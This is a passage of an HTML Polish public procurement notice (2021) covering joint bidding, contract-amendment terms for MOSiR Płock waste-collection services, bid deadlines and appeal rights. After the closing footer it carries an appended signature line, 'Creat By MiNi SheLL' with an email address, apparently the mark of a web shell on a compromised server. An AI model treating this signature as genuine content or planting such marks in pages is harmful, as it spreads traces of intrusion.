udzielenie zamówienia (konsorcjum / spółka cywilna itp.),<br/>2)	Wykonawcy mają obowiązek ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>	Pełnomocnictwo musi być podpisane przez pozostałych Wykonawców, wspólnie ubiegających się o zamówienie lub ich uprawnionych przedstawicieli.<br/>UWAGA: Forma udzielonego pełnomocnictwa musi spełniać wymagania takie jak forma przygotowanej oferty (zgodnie z art. 99 § 1 kc),<br/>3)	Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, musi być przedstawiona jako jedna oferta, do której należy dołączyć: <br/>a) oświadczenia, o których mowa w Rozdz. VII ust. 1 pkt 1 i 2, złożone przez każdego z Wykonawców, potwierdzające brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu, w zakresie w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału <br/>w postępowaniu;<br/>b) oświadczenie, z którego wynika, jaki zakres usługi wykonają poszczególni Wykonawcy. <br/>Spełnienie warunków:<br/>a) warunek dot. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (posiadanie wymaganych licencji, koncesji, zezwoleń, wpisu do rejestru działalności regulowanej itp.) jest spełniony, jeżeli co najmniej jeden z Wykonawców posiada uprawnienia <br/>do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>i zrealizuje roboty budowlane, do których realizacji te uprawnienia<br/> są wymagane,<br/>b)	warunek określony w ust. 2 pkt 3 (zdolność ekonomiczna i finansowa) oraz pkt 4 (zdolność techniczna lub zawodowa) – musi spełniać co najmniej jeden z Wykonawców, <br/>c)	w odniesieniu do warunków dot. doświadczenia, Wykonawcy mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, <br/>do realizacji których te zdolności są wymagane; <br/>4)	Wykonawcy składający ofertę wspólną, ponoszą solidarną odpowiedzialność <br/>za wykonanie umowy – zgodnie art. 445 ust. 1 Ustawy Pzp; <br/>5) jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana jako najkorzystniejsza, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia, kopii umowy regulującej współpracę tych Wykonawców – zgodnie z art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany treści Umowy, wymagają zgody obu Stron oraz formy pisemnej pod rygorem nieważności. Zmiana Umowy możliwa jest w przypadku gdy wynika to z okoliczności, których nie można było przewidzieć w chwili podpisania Umowy. <br/>2.	Strony dopuszczają następujący zakres zmian:<br/>1)	terminu wykonania przedmiotu Umowy (wydłużenia lub skrócenia) w przypadku:<br/>a)	zaistnienia sytuacji niezależnych od MOSiR m.in. jak: ataki terroryzmu, rewolucje, przewroty wojskowe lub cywilne, wojna domowa, skażenia radioaktywne, zagrożenie epidemiczne lub wystąpienie epidemii, klęski żywiołowe, wprowadzenie stanu zagrożenia, stanu wyjątkowego lub inne zdarzenia,<br/>b)	wystąpienia konieczności wyłączenia obiektu z funkcjonowania - na okres dłuższy niż 20 dni kalendarzowych. W takim przypadku MOSiR ma także prawo do wypowiedzenia umowy lub jej części bez żadnych skutków dla niego. O konieczności wyłączenia obiektu z funkcjonowania MOSiR jest zobowiązany zawiadomić Wykonawcę w terminie niezwłocznym, a w przypadku wystąpienia przesłanek do wypowiedzenia umowy obowiązywać będzie dwutygodniowy okres wypowiedzenia;<br/>2)	wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany:<br/>a)	ustawowej stawki podatku od towarów i usług VAT;<br/>b)	zmiany wysokości minimalnego wynagrodzenia za pracę albo zmiany wysokości minimalnej stawki godzinowej;<br/>c)	zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne <br/>lub zdrowotne;<br/>d)	zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. <br/>o pracowniczych planach kapitałowych ;<br/>3)	w przypadku wystąpienia sytuacji określonej w § 6 ust. 2 pkt 1), MOSiR przysługuje również możliwość:<br/>a)	przystąpienia do rozmów z Wykonawcą w celu dokonania ustaleń w zakresie dalszej realizacji zamówienia;<br/>b)	zawieszenia umowy na okres wystąpienia zdarzenia uzasadniającego zawieszenie, ze wszystkimi konsekwencjami zawieszenia tj.: brakiem świadczenia usługi i wynagrodzenia. W przypadku wystąpienia takiej sytuacji Umowa zostaje przedłużona o taki okres na jaki została zawieszona. <br/>3.	Wystąpienie innych, niż podane wyżej, przyczyn, niezależnych od woli Stron, uniemożliwiających należyte wykonanie przedmiotu Umowy bądź wykonanie Umowy.<br/>4.	MOSiR zastrzega sobie prawo w wyjątkowych i nieprzewidzianych sytuacjach <br/>do zmniejszenia lub zwiększenia częstotliwości i ilości odbieranych odpadów, w tym zmiany harmonogramu i możliwość wystąpienia konieczności wywozu odpadów poza ustalonym harmonogramem oraz możliwość zmiany liczby i wielkości pojemników.<br/>5.	MOSiR zastrzega sobie możliwość świadczenia usługi przez Wykonawcę <br/>także w innym Obiekcie niż Obiekty wskazane w niniejszej Umowie, <br/>m.in. w przypadku przejęcia przez MOSiR nowego obiektu do zarządzania. <br/>6.	Podstawę do zmiany Umowy może stanowić także zmiana powszechnie obowiązujących przepisów prawa oraz przepisów prawa lokalnego lub wydanie prawomocnego orzeczenia sądowego albo ostatecznego aktu administracyjnego.<br/>9.	Z uwagi na to, że niniejsza Umowa zawierana jest w okresie stanu epidemii, ogłoszonego w związku z COVID 19, Strony dopuszczają zmiany Umowy w zakresie określonym w art. 15 ustawy z dn. 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz.U. z 2020 r., poz. 374 ze zm.), w przypadku wystąpienia w okresie realizacji umowy takich sytuacji, które będą wymagały zastosowania rozwiązań, określonych w przepisach przywołanej ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ePUAP:/mosirplock/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-05 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawcy oraz innemu podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisów ustawy Pzp, przysługują środki ochrony prawnej, <br/>na zasadach i w terminach określonych w Ustawie Pzp dla zamówienia o wartości mniejszej niż progi unijne.<br/>2.	Zgodnie z art. 513 Ustawy Pzp odwołanie przysługuje na:<br/>1)	niezgodną z przepisami ustawy czynność Zamawiającego, podjętą <br/>w postępowaniu o udzielenie zamówienia, w tym na projektowane postanowienia umowy,<br/>2)	zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której Zamawiający był zobowiązany na podstawie ustawy, <br/>3)	zaniechanie przeprowadzenia postępowania o udzielenie zamówienia, mimo że Zamawiający był do tego zobowiązany.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com